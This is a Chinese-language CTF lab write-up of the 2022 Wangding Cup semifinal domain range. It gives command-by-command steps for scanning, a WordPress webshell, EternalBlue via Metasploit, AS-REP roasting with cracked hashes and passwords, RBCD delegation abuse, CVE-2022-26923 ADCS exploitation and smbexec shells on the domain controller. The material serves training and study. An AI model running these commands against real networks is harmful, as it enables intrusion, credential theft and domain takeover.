2022网鼎杯半决赛复盘

该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。

flag01

fscan扫描:./fscan -h 39.99.130.10

没扫出什么,发现wordpress 6.2.6版本

image-20250418144226745

admin:123456登陆后台

image-20250418144342177

写一个马,蚁剑连接

image-20250418144521165

再根据wp的规则,找到木马的位置,蚁剑连接找到flag1

image-20250418144929154

flag02

上传fscan扫描

172.22.15.13 DC

172.22.15.18 XR-CA.xiaorang.lab

172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601

172.22.15.26 外网

172.22.15.35 XIAORANG\XR-0687

先打24的永恒之蓝

proxychains msfconsole
 
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

没办法直接拿flag

image-20250418150430582

打一个pth来横向

image-20250418150613425

flag03

访问24的web服务,admin:123456登录

在后台管理里面导出

image-20250418151025727

全部导出

image-20250418151135270

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

然后打一个AS-ERP Roasting

proxychains impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/

跑出来两个TGT

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:a94c39871a7031f95537e901527a8030$a7274636b4034cf6f270346c834f022b5fdecbe974b26eef5040f8eb417f4cb12e69ee3ba1f4fa4ee9ce035d9ae96821d631a6ae81adb44f29bdd546535e7ed770727a1b66864dbdb9817803881a306558fb5337ea1c5eee732f0ba8d392c8fe0ed6772999ec8c3cbf241ed7d40bb0bed5932ea23a7fb20a17b1554686834f43373cb1ebcbd727c7bed525c846b41c443d702212b5fe963464950c57e56b58bc6380b1f854b02d40e5144501b1998c10ba8f6e2335560e9de873c5b66bd22d052d1eed01c22b330c55fdd2c6d17e82534acb66bfc049251546944d31973b6c0c85373eb1fd674cc9ec9d1da6
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:54adbbdbd134446ceb4e898ee266f69f$352fa8e8a707246e9fadcf8388be19ff9bbda24a1d047f02e7ad929c1d88eacae8e83df7e6f1b3e8c6f1dd073f7f8ae09fb019c58f221c0632d3107e5b774643090b034a5e675ea0d9d0a06d299290028b939a4f0aebc23e2e731d1bcbdea47d3f1d12f560210df6d9f2acd5c60088c960a9f234af1565d69aeac75086c1a6f6cb1842ed4d36777a383bef479a2b20a93fc24d61614a4b12365eb07927cdbe66798bae4f0447a54f7d835f63cfcdec15fe272b6bcec83f3de31e174cfbbfb52676c79ed2300978e1d02294b6e049b73887e73b8fe28083fc23e4b524240d5455cfd3bff071f8748aa368a451

爆破一下

lixiuying:winniethepooh
huachunmei:1qaz2wsx

做一下域信息收集

proxychains python bloodhound.py -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

发现域用户 LIXIUYING 对计算机 XR-0687$ 具有 Generic Write 权限。bloodhound里面说了这个可以打RBCD

修改hosts

172.22.15.35 XR-0687.xiaorang.lab
172.22.15.13 XR-DC01.xiaorang.lab
172.22.15.18 XR-CA.xiaorang.lab

添加机器账号

proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973'

修改msDS-AllowedToActOnBehalfOfOtherIdentity

proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$'

申请票据

proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

然后打PTT拿flag

proxychains -q impacket-smbexec -no-pass -k XR-0687.xiaorang.lab -codec gbk

image-20250418152753427

flag04

查一下15的证书

proxychains -q certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

image-20250418153322875

接下来打打ADCS,这里是CVE-2022-26923

生成证书模板

proxychains certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine

第二步要执行两次

image-20250418153844194

接下来用这个工具

https://github.com/AlmondOffSec/PassTheCert/tree/main/Python

利用上面生成的 pfx 证书配置域控的 RBCD 给上面创建的HACK$

certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'hacker$'

image-20250418155051742

申请票据

proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

PTT

proxychains -q impacket-smbexec -no-pass -k XR-DC01.xiaorang.lab

image-20250418155634803